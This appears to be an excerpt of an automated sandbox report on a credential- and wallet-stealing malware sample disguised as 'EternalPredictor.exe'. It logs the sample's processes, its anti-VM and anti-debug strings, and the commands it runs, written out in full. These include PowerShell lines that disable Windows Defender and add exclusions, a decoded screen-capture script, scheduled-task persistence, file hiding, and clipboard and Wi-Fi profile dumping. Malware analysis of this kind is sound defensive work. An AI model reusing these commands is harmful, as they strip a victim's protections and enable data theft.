                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\XClient.exe | Thread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\program.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                        Source: C:\Users\user\AppData\Roaming\program.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
                        Source: C:\Users\user\AppData\Roaming\program.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                        Source: C:\Users\user\AppData\Roaming\program.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                        Source: C:\Users\user\AppData\Roaming\program.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                        Source: C:\Users\user\AppData\Roaming\program.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                        Source: getmac.exe, 00000047.00000002.1690693599.000002A33CDFE000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000047.00000003.1686883329.000002A33CDE3000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000047.00000003.1687922319.000002A33CDFD000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000047.00000003.1687630217.000002A33CDE3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V
                        Source: SecurityHealthSystray.exe, 0000004A.00000000.1680272657.00000000010B5000.00000002.00000001.01000000.0000001E.sdmpBinary or memory string: Handshakemath/randClassINETAuthorityquestionsinfo_hashuser32.dllvmwaretrayxenservicevmwareusermegadumperscyllahidevirtualboxPxmdUOpVyxQ9IATRKPRHPaul Jonesd1bnJkfVlHQarZhrdBpjPC-DANIELEqarzhrdbpjq9iatrkprhd1bnjkfvlhJUDES-DOJOGJAm1NxXVmdOuyo8RV7105KvAUQKPQOf20XqH4VLpxmduopvyxJcOtj17dZxcM0uEGN4do64F2tKIqO5GexwjQdjXGfNBDSlDTXYmcafee.comnorton.comzillya.comsophos.comclamav.netpowershellsystemrootlogins.txtLogin DataChrome SxS360BrowserUR BrowserdiscordptbinitiationByHackirbysecure.datauto_startsteam-tempEpic Games.minecraftRiot GamesShowWindow-NoProfileExtensionsExodusWeb3PaliWalletwinsymlink/dev/stdinCreateFileterminatedowner diedDnsQuery_WGetIfEntryCancelIoExCreatePipeGetVersionWSACleanupWSAStartupgetsockoptsetsockoptdnsapi.dllws2_32.dllexecerrdotSYSTEMROOTavatar_url
                        Source: program.exe, 00000008.00000002.1939141033.00000237A49E0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vboxservice
                        Source: program.exe, 00000008.00000002.1939141033.00000237A49E0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: fvmwareservice
                        Source: SecurityHealthSystray.exe, 0000004A.00000000.1680272657.00000000010B5000.00000002.00000001.01000000.0000001E.sdmpBinary or memory string: (scan MB in pacer: % CPU ( zombie, j0 = head = panic: nmsys= locks= dying= allocs m->g0= pad1= pad2= text= minpc= value= (scan)types : type TuesdayJanuaryOctoberMUI_StdMUI_DltAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutapdh.dllwindowswsarecvwsasendlookup writetoavx512fSHA-224SHA-256SHA-384SHA-512InstAltInstNopalt -> nop -> any -> NRGBA64tls3desderivedInitialExpiresSubjectcharsetos/execruntimeanswers]?)(.*)Ed25519MD5-RSAserial:eae_prk2.5.4.62.5.4.32.5.4.52.5.4.72.5.4.82.5.4.9amxtileamxint8amxbf16osxsavevmtoolsdvboxtraypestudiovmacthlpksdumperdebuggerstrongodgraywolf0harmonyreversalUSERNAMEEIEEIFYEGBQHURCCORXGKKZCoreleepcJBYQTQBOMARCI-PClmVwjj9bGRXNNIIELUCAS-PCjulia-pcXGNSVODUESPNHOOLORELEEPCVONRAHELTMKNGOMUJULIA-PC05h00Gi05ISYH9SHICQja5iTQZSBJVWMUspG1y1CecVtZ5wEBUiA1hkmOZFUCOD6o8yTi52Th7dk1xPrQORxJKNkgL50ksOpSqgFOf3Gj.seancedxd8DJ7clmvwjj9beset.com-CommandDisabled0.0.0.0 Web DataWaterfoxK-MeleonCyberfoxBlackHawUsernamePasswordBrowsers```%s```ChromiumElementsCatalinaQIP SurfpasswordbancairemetamaskdatabasePicturesOneDriveindex.jsSettingssettings.featherNovolinealts.txtPaladiumgames-%s
                        Source: SecurityHealthSystray.exe, 0000004A.00000000.1680272657.00000000010B5000.00000002.00000001.01000000.0000001E.sdmpBinary or memory string: res binderres masterresumptionexp masterContent-IdMessage-IdHTTP_PROXYhttp_proxyhttp2debugcrypto/tlsParseAddr(invalid IPClassCSNETClassCHAOSAdditionalskipping: SHA256-RSASHA384-RSASHA512-RSADSA-SHA256ECDSA-SHA1base_noncePOSTALCODEavx512ifmaavx512vbmiavx512vnniavx512gfniavx512vaesavx512bf16EnumWindowsOpenProcessvboxservicecodecrackerBAROSINO-PCCOFFEE-SHOParchibaldpcARCHIBALDPCLANTECH-LLCALENMOOS-PC9yjCPsEYIMHnoK4zG7ZhOfOgJb6GqgK0OnZAp7UBVaS1xPLyvzr8sgCBvJChRPnsxnykj0egq7fzeuHUQIuwoEFUkFu0lQwgX5PryjIJKIrOMs4tgiizsLimS95.25.81.2435.199.6.1334.105.0.2780.211.0.9778.139.8.50totalav.comadaware.comThunderbirdTarget Pathcookies.txt%-70s %-70shistory.txtdescriptionCrypt32.dllLocal StateCentBrowserFiles Foundmot_de_passFatal ErrorMessageBoxW`
                        Source: program.exe, 00000008.00000002.1939141033.00000237A49E0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmwareuser
                        Source: program.exe, 00000008.00000003.1743204693.00000237A5926000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V Requirements: VM Moni
                        Source: getmac.exe, 00000047.00000003.1686883329.000002A33CDE3000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000047.00000003.1687630217.000002A33CDE3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SetPropValue.sSubKeyName("SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage");
                        Source: getmac.exe, 00000047.00000002.1690693599.000002A33CDFE000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000047.00000003.1686883329.000002A33CDE3000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000047.00000003.1687922319.000002A33CDFD000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000047.00000003.1687630217.000002A33CDE3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                        Source: program.exe, 00000008.00000002.1939141033.00000237A49E0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmsrvc
                        Source: getmac.exe, 00000047.00000003.1687528519.000002A33CE15000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000047.00000002.1690693599.000002A33CE17000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000047.00000003.1686883329.000002A33CDE3000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000047.00000003.1687362776.000002A33CE0F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: __PARAMETERSSYSTEM\CurrentControlSet\Services\Hyper-V\LinkageExport*
                        Source: program.exe, 00000008.00000002.1939141033.00000237A49E0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: 9fvmwaretray
                        Source: program.exe, 00000008.00000002.1939141033.00000237A49E0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmwaretray
                        Source: program.exe, 00000008.00000003.1743975302.00000237A5859000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1728396293.00000237A4E1C000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000002.1945952201.00000237A5859000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1715550482.00000237A5926000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
                        Source: program.exe, 00000008.00000002.1939141033.00000237A49E0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: f2vmusrvc
                        Source: skuld.exe, 00000003.00000002.1611437577.0000020F19FDC000.00000004.00000020.00020000.00000000.sdmp, SecurityHealthSystray.exe, 0000004A.00000002.1740450700.0000029DB581D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: SecurityHealthSystray.exe, 00000036.00000002.1740993816.00000206F4C2C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllkk
                        Source: getmac.exe, 00000047.00000002.1690693599.000002A33CDFE000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000047.00000003.1686883329.000002A33CDE3000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000047.00000003.1687922319.000002A33CDFD000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000047.00000003.1687630217.000002A33CDE3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Win32_NetworkProtocolHyper-V RAWHyper-VRAWHyper-V RAWrkProtocolRSV
                        Source: program.exe, 00000008.00000002.1939141033.00000237A49E0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vboxtray
                        Source: program.exe, 00000008.00000002.1939141033.00000237A49E0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: qemu-ga
                        Source: program.exe, 00000008.00000002.1939141033.00000237A49E0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: dytesqemu-ga
                        Source: SecurityHealthSystray.exe, 0000004A.00000000.1680272657.00000000010B5000.00000002.00000001.01000000.0000001E.sdmpBinary or memory string: tznamerdtscppopcntempty rune1 RGBA64Gray16X25519%w%.0wAcceptServercmd/goheaderAnswerLengthSTREETavx512rdrandrdseedwebhookcryptosregeditollydbgdf5servvmusrvctaskmgrqemu-gafakenetfiddlerdumpcapsharpodsnifferpetoolsharmonycharlesphantomx32_dbgx64_dbgwpe pro3u2v9m8SERVER1MIKE-PCNETTYPClisa-pcHEUeRzljohn-pcZELJAVALISA-PCWILEYPCJOHN-PCserver1wileypcAIDANPC7DBgdxuJAW4Dz0cMkNdS6Mr.Nonej7pNjWMequZE3Jo6jdigqKUv3bT4ymONofgheuerzlIVwoKUFavg.comDefaultFirefoxMercuryAddressNetworkCookiesHistorykey4.dbThoriumIridiumVivaldiOrbitumMaxthonK-MelonSputnikSlimjetOperaGXaccountaddressDesktopcontentAppDatadiscordmodulesRoamingversionWindowsFeatherBadlionleveldbAPPDATACaption%.2f GBprofileDiscord`Nitro`.sqlitecmd.exeWallets\ArmoryCoinomiBinanceMartianPhantomSafepalSolfareiWalletLICENSEProtectfloat32float64readdirconsoleabortedCopySidWSARecvWSASendconnectsignal runningPATHEXT_pragmapragma _txlocknumber nil keyUpgradeTrailersocks5hHEADERSReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGname %q:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECT19531259765625FreeSidSleepExinvaliduintptrSwapperChanDir Value>Convert\\.\UNCforcegcallocmWcpuprofallocmRunknowngctraceIO waitsyscallwaitingforevernetworkUNKNOWN:events, goid= s=nil
                        Source: SecurityHealthSystray.exe, 0000004A.00000000.1680272657.00000000010B5000.00000002.00000001.01000000.0000001E.sdmpBinary or memory string: OpenEventAUnlockFileunrechableno consoleenter-fastRIPEMD-160impossible[:^alnum:][:^alpha:][:^ascii:][:^blank:][:^cntrl:][:^digit:][:^graph:][:^lower:][:^print:][:^punct:][:^space:][:^upper:][:xdigit:]rune <nil>image: NewBM????res binderres masterresumptionexp masterContent-IdMessage-IdHTTP_PROXYhttp_proxyhttp2debugcrypto/tlsParseAddr(invalid IPClassCSNETClassCHAOSAdditionalskipping: SHA256-RSASHA384-RSASHA512-RSADSA-SHA256ECDSA-SHA1base_noncePOSTALCODEavx512ifmaavx512vbmiavx512vnniavx512gfniavx512vaesavx512bf16EnumWindowsOpenProcessvboxservicecodecrackerBAROSINO-PCCOFFEE-SHOParchibaldpcARCHIBALDPCLANTECH-LLCALENMOOS-PC9yjCPsEYIMHnoK4zG7ZhOfOgJb6GqgK0OnZAp7UBVaS1xPLyvzr8sgCBvJChRPnsxnykj0egq7fzeuHUQIuwoEFUkFu0lQwgX5PryjIJKIrOMs4tgiizsLimS95.25.81.2435.199.6.1334.105.0.2780.211.0.9778.139.8.50totalav.comadaware.comThunderbirdTarget Pathcookies.txt%-70s %-70shistory.txtdescriptionCrypt32.dllLocal StateCentBrowserFiles Foundmot_de_passFatal ErrorMessageBoxW`
                        Source: program.exe, 00000008.00000002.1939141033.00000237A49E0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmware
                        Source: program.exe, 00000008.00000002.1939141033.00000237A49E0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmusrvc
                        Source: program.exe, 00000008.00000003.1549428382.00000237A4819000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: vmware)
                        Source: eternal.exe, 00000002.00000002.3236463360.000000001BE94000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWIm%SystemRoot%\system32\mswsock.dll.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=MSIL"/>
                        Source: getmac.exe, 00000047.00000003.1687528519.000002A33CE15000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000047.00000002.1690693599.000002A33CE17000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000047.00000003.1686883329.000002A33CDE3000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000047.00000003.1687362776.000002A33CE0F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage
                        Source: program.exe, 00000008.00000002.1939141033.00000237A49E0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmtoolsd
                        Source: program.exe, 00000008.00000002.1939141033.00000237A49E0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: f01vmsrvc
                        Source: SecurityHealthSystray.exe, 0000004A.00000000.1680272657.00000000010B5000.00000002.00000001.01000000.0000001E.sdmpBinary or memory string: max=scav ptr ] = (usageinit ms, fault tab= top=[...], fp:MarchApril+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930monthGreekAdlamBamumBatakBuhidDograKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilcpu%dfilesimap2imap3imapspop3shostsrouteparsesse41sse42ssse3SHA-1matchrune NRGBAtls: Earlyutf-8%s*%dtext/bad n (at ClassP-224P-256P-384P-521ECDSAx32dbgvmsrvcprl_ccx96dbgdbgclrde4dotwindbgpc-retx64dbgghidraVMwarevmwarexc64zb8VizSM373836ALIONETVM-PCgeorgeGRAFPCT00917test42XC64ZB5Y3y73serverh86LHDDdQrgcQfofoGlK3zMRPgfV1XIZZuXj8vizsmASPNETS7WjufUser01tHiF2TGjBsjbLouiseGGw8NR3W1GJT-ForceattribNumberembedssqliteChromeChedotKometaFenrirCoowonLiebaoDragonCocCocYandexsecretpaypalbanquewalletcryptoexodusatomiccomptecreditpermisnumberbackupconfigVideosinlinefieldsConfigIntentMeteorImpactPolyMCBypassSystem
                        Source: program.exe, 00000008.00000002.1939141033.00000237A49E0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: f5vmware
                        Source: program.exe, 00000008.00000002.1939141033.00000237A49E0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: fvmwareuser
                        Source: eternal.exe, 00000002.00000002.3199743103.000000000110B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                        Source: program.exe, 00000008.00000002.1939236456.00000237A4AE0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllB
                        Source: program.exe, 00000008.00000002.1939141033.00000237A49E0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmwareservice
                        Source: C:\Users\user\AppData\Roaming\eternal.exe | Process information queried: ProcessInformation
                        Source: C:\Users\user\AppData\Roaming\eternal.exe | Process queried: DebugPort
                        Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 5_2_00007FF72C66A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FF72C66A614
                        Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 8_2_00007FFBA4220350 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,8_2_00007FFBA4220350
                        Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 5_2_00007FF72C673480 GetProcessHeap,5_2_00007FF72C673480
                        Source: C:\Users\user\AppData\Roaming\eternal.exe | Process token adjusted: Debug
                        Source: C:\Users\user\AppData\Roaming\skuld.exe | Process token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                        Source: C:\Users\user\AppData\Roaming\XClient.exe | Process token adjusted: Debug
                        Source: C:\Windows\System32\tasklist.exe | Process token adjusted: Debug
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe | Process token adjusted: Debug
                        Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 5_2_00007FF72C66A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FF72C66A614
                        Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 5_2_00007FF72C65C8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FF72C65C8A0
                        Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 5_2_00007FF72C65D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FF72C65D12C
                        Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 5_2_00007FF72C65D30C SetUnhandledExceptionFilter,5_2_00007FF72C65D30C
                        Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 8_2_00007FF72C66A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00007FF72C66A614
                        Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 8_2_00007FF72C65C8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00007FF72C65C8A0
                        Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 8_2_00007FF72C65D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00007FF72C65D12C
                        Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 8_2_00007FF72C65D30C SetUnhandledExceptionFilter,8_2_00007FF72C65D30C
                        Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 8_2_00007FFBA4176058 SetUnhandledExceptionFilter,8_2_00007FFBA4176058
                        Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 8_2_00007FFBA4173248 IsProcessorFeaturePresent,00007FFBBB591A90,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,00007FFBBB591A90,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00007FFBA4173248
                        Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 8_2_00007FFBA43D4390 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00007FFBA43D4390
                        Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 8_2_00007FFBA66A339C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00007FFBA66A339C
                        Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 8_2_00007FFBA66AE070 SetUnhandledExceptionFilter,8_2_00007FFBA66AE070
                        Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 8_2_00007FFBAA493318 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00007FFBAA493318
                        Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 8_2_00007FFBAA499038 RtlLookupFunctionEntry,SetUnhandledExceptionFilter,8_2_00007FFBAA499038
                        Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 8_2_00007FFBAA499050 SetUnhandledExceptionFilter,8_2_00007FFBAA499050
                        Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 8_2_00007FFBAA4C37E0 IsProcessorFeaturePresent,00007FFBBB591A90,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,00007FFBBB591A90,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00007FFBAA4C37E0
                        Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 8_2_00007FFBAA4C7060 SetUnhandledExceptionFilter,8_2_00007FFBAA4C7060
                        Source: C:\Users\user\Desktop\EternalPredictor.exe | Memory allocated: page read and write | page guard

                        HIPS / PFW / Operating System Protection Evasion

                        Source: C:\Users\user\AppData\Roaming\program.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\program.exe'"
                        Source: C:\Users\user\AppData\Roaming\program.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'"
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\program.exe'
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
                        Source: C:\Windows\System32\cmd.exe | Process created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
                        Source: C:\Users\user\AppData\Roaming\program.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                        Source: C:\Users\user\AppData\Roaming\program.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                        Source: C:\Users\user\AppData\Roaming\program.exe File written: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Roaming\program.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                        Source: C:\Windows\System32\consent.exe Memory written: C:\Windows\System32\svchost.exe base: F642FE388
                        Source: C:\Users\user\Desktop\EternalPredictor.exe Process created: C:\Users\user\AppData\Roaming\eternal.exe "C:\Users\user\AppData\Roaming\eternal.exe"
                        Source: C:\Users\user\Desktop\EternalPredictor.exe Process created: C:\Users\user\AppData\Roaming\skuld.exe "C:\Users\user\AppData\Roaming\skuld.exe"
                        Source: C:\Users\user\Desktop\EternalPredictor.exe Process created: C:\Users\user\AppData\Roaming\program.exe "C:\Users\user\AppData\Roaming\program.exe"
                        Source: C:\Users\user\AppData\Roaming\eternal.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\user\AppData\Roaming\XClient.exe"
                        Source: C:\Users\user\AppData\Roaming\skuld.exe Process created: C:\Windows\System32\attrib.exe attrib +h +s C:\Users\user\AppData\Roaming\skuld.exe
                        Source: C:\Users\user\AppData\Roaming\skuld.exe Process created: C:\Windows\System32\attrib.exe attrib +h +s C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
                        Source: C:\Users\user\AppData\Roaming\skuld.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get UUID
                        Source: C:\Users\user\AppData\Roaming\program.exe Process created: C:\Users\user\AppData\Roaming\program.exe "C:\Users\user\AppData\Roaming\program.exe"
                        Source: C:\Users\user\AppData\Roaming\program.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                        Source: C:\Users\user\AppData\Roaming\program.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                        Source: C:\Users\user\AppData\Roaming\program.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                        Source: C:\Users\user\AppData\Roaming\program.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                        Source: C:\Users\user\AppData\Roaming\program.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                        Source: C:\Users\user\AppData\Roaming\program.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                        Source: C:\Users\user\AppData\Roaming\program.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
